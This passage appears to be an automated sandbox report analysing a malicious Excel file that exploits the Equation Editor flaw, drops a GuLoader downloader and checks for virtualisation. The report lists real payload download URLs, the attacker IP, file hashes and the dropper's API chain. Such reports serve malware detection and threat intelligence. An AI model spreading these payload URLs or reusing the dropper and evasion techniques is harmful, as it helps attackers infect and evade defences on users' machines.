File source: 00000004.00000002.1159273046.0000000003A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\Public\vbc.exe

Code function: 4_2_734F30C0 push eax; ret

4_2_734F30EE

Source: wxbase30u_xml_gcc_custom.dll.4.dr

Static PE information: section name: .xdata

Source: C:\Users\Public\vbc.exe

Code function: 4_2_734F1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

4_2_734F1BFF

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp\System.dll	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03570435 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_03570435

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe

RDTSC instruction interceptor: First address: 0000000003A50A78 second address: 0000000003A50A78 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FB704D0F74Ah 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2532

Thread sleep time: -240000s >= -30000s

Jump to behavior

Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll	Jump to dropped file

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406850 FindFirstFileW,FindClose,	4_2_00406850
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405C26
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-2206
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-2235
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-2255
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-2209
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-2305
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-2308
Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node	graph_4-4648
Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node	graph_4-4804

Source: EQNEDT32.EXE, 00000002.00000002.957995043.0000000000602000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}H
Source: vbc.exe, 00000004.00000002.1159159152.00000000009C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Users\Public\vbc.exe

Code function: 4_2_734F1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

4_2_734F1BFF

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03570540 mov edx, dword ptr fs:[00000030h]

2_2_03570540

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\Public\vbc.exe

4_2_0040350A

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scripting	Path Interception	1 Access Token Manipulation	111 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	11 Process Injection	1 Disable or Modify Tools	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	33 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	22 Exploitation for Client Execution	Logon Script (Windows)	1 Extra Window Memory Injection	1 Virtualization/Sandbox Evasion	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Access Token Manipulation	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	121 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	15 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Scripting	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Obfuscated Files or Information	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Extra Window Memory Injection	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
TransportLabel_6170453602.xlsx	39%	ReversingLabs	Document-OLE.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	14%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	23%	ReversingLabs	Win32.Downloader.GuLoader
C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://barsam.com.au/bin_QuCucbUMda229.bin	0%	Avira URL Cloud	safe
http://103.149.13.182/msdrive10/.svchost.exe	100%	Avira URL Cloud	malware
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://103.149.13.182/msdrive10/.svchost.exemmC:	0%	Avira URL Cloud	safe
http://103.149.13.182/msdrive10/.svchost.exeigh	0%	Avira URL Cloud	safe
http://103.149.13.182/msdrive10/.svchost.exej	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0C	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://barsam.com.au/bin_QuCucbUMda229.bin	true	Avira URL Cloud: safe	unknown
http://103.149.13.182/msdrive10/.svchost.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	EQNEDT32.EXE, 00000002.00000002.957995043.0000000000602000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.957102265.000000000040A000.00000008.00000001.01000000.00000004.sdmp, .svchost[1].exe.2.dr, vbc.exe.2.dr	false		high
http://ocsp.sectigo.com0	vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr	false	URL Reputation: safe	unknown
http://103.149.13.182/msdrive10/.svchost.exemmC:	EQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://103.149.13.182/msdrive10/.svchost.exeigh	EQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://103.149.13.182/msdrive10/.svchost.exej	EQNEDT32.EXE, 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0C	vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.149.13.182	unknown	unknown		135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	624947
Start date and time: 12/05/202209:26:39	2022-05-12 09:26:39 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	TransportLabel_6170453602.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@4/26@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 85.5% (good quality ratio 84.2%) Quality average: 87% Quality standard deviation: 21.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 44 Number of non-executed functions: 35
Cookbook Comments:	Found application associated with file extension: .xlsx Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: TransportLabel_6170453602.xlsx

Simulations

Behavior and APIs

Time	Type	Description
09:28:37	API Interceptor	116x Sleep call for process: EQNEDT32.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
103.149.13.182	OR17233976_00019489_20170619154218.xlsx	Get hash	malicious	Browse	103.149.13.182/365space/.svchost.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	JVEdWgNqjA.ps1	Get hash	malicious	Browse	103.133.105.61
	RFQ DOCUMENT.xlsx	Get hash	malicious	Browse	180.214.236.4
	DRAFT SHIPPING DOCUMENTS.xlsx	Get hash	malicious	Browse	103.99.0.198
	Comanda furnizorului-83613.xlsx	Get hash	malicious	Browse	180.214.238.224
	OR17233976_00019489_20170619154218.xlsx	Get hash	malicious	Browse	103.149.13.182
	POFOODEXPO2022.xlsx	Get hash	malicious	Browse	103.149.12.43
	Quotation.xlsx	Get hash	malicious	Browse	103.145.255.4
	NEW ORDER.xlsx	Get hash	malicious	Browse	103.99.0.198
	Quotation Request From Wnsche Group GmbH Germany.xlsx	Get hash	malicious	Browse	103.141.138.195
	pedido_639.xlsx	Get hash	malicious	Browse	103.89.89.198
	PO050522_Airhawk.xlsx	Get hash	malicious	Browse	103.149.12.43
	AWB_NO_9284730932.xlsx	Get hash	malicious	Browse	103.147.185.53
	AWB_NO_9284730932.xlsx	Get hash	malicious	Browse	103.147.185.53
	PR 00120181213.xlsx	Get hash	malicious	Browse	103.89.89.198
	DHL_AWB_NO#907853880911.xlsx	Get hash	malicious	Browse	103.147.185.100
	6kNanOe8YB	Get hash	malicious	Browse	123.31.41.38
	E4HNV1HTPK.exe	Get hash	malicious	Browse	103.147.185.85
	Payment Voucher.xlsx	Get hash	malicious	Browse	103.147.185.85
	IRQ2207798.xlsx	Get hash	malicious	Browse	103.89.89.198
	dEHXEDmi4s	Get hash	malicious	Browse	14.225.246.69

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll	OR17233976_00019489_20170619154218.xlsx	Get hash	malicious	Browse
	DWG-1579.exe	Get hash	malicious	Browse
	RFQ-1579.exe	Get hash	malicious	Browse
	DWG-1579.exe	Get hash	malicious	Browse
	RFQ-1579.xlsx	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll	OR17233976_00019489_20170619154218.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	downloaded
Size (bytes):	326847
Entropy (8bit):	7.537994904334399
Encrypted:	false
SSDEEP:	6144:13yztyL/0/bbdat6J9mOnuuAgo+/sOxCHBs4YIwUrJrnBpKussJ9LQu:13pL0/bbdat6JIO1Ag2TBs4YI3BnB35N
MD5:	D5E55A57372BCAD45FBB260105179CAF
SHA1:	9B1935A927C072DD31017362FF1739BF1EA2AAF7
SHA-256:	3C27C2AA1BC826FAA65AB4038EB385CABD6DB50108410E6F674D455AA1DC5532
SHA-512:	088033564668A4FD3E107566387FECF0B6DCBD7A161C9EF3E4ADB232520467A64AF9EEC740FE783D5C62FA3B79BDD910E72F3ACC838E5FA155427C83003C407B
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 14%, Browse Antivirus: ReversingLabs, Detection: 23%
Reputation:	low
IE Cache URL:	http://103.149.13.182/msdrive10/.svchost.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L...h.Oa.................h....:......5............@...........................>...........@..........................................`=..Y...........................................................................................................text...pf.......h.................. ..`.rdata...............l..............@..@.data...x.9.........................@....ndata........:..........................rsrc....Y...`=..Z..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1F3E17F6.jpeg

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
Category:	dropped
Size (bytes):	4396
Entropy (8bit):	7.884233298494423
Encrypted:	false
SSDEEP:	96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
MD5:	22FEC44258BA0E3A910FC2A009CEE2AB
SHA1:	BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
SHA-256:	5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
SHA-512:	8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
Malicious:	false
Reputation:	high, very likely benign file
Preview:	......JFIF........................................................... ....+!.$...2"37%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h].#'zZ...2.hZ...K.K..b#s&...c@K.AO..}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48839F74.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:	192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F64A789.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 139 x 180, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2647
Entropy (8bit):	7.8900124483490135
Encrypted:	false
SSDEEP:	48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
MD5:	E46357D82EBC866EEBDA98FA8F94B385
SHA1:	76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
SHA-256:	B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
SHA-512:	8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
Malicious:	false
Reputation:	high, very likely benign file
Preview:	.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.....Y\.....o..4...bl.6.1...Y.".\|.2A@y.../...X.X..X..2X.........o.Xz}go.m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v.......P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}......{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\81B469ED.jpeg

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
Category:	dropped
Size (bytes):	4396
Entropy (8bit):	7.884233298494423
Encrypted:	false
SSDEEP:	96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
MD5:	22FEC44258BA0E3A910FC2A009CEE2AB
SHA1:	BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
SHA-256:	5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
SHA-512:	8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
Malicious:	false
Preview:	......JFIF........................................................... ....+!.$...2"37%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h].#'zZ...2.hZ...K.K..b#s&...c@K.AO..}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.

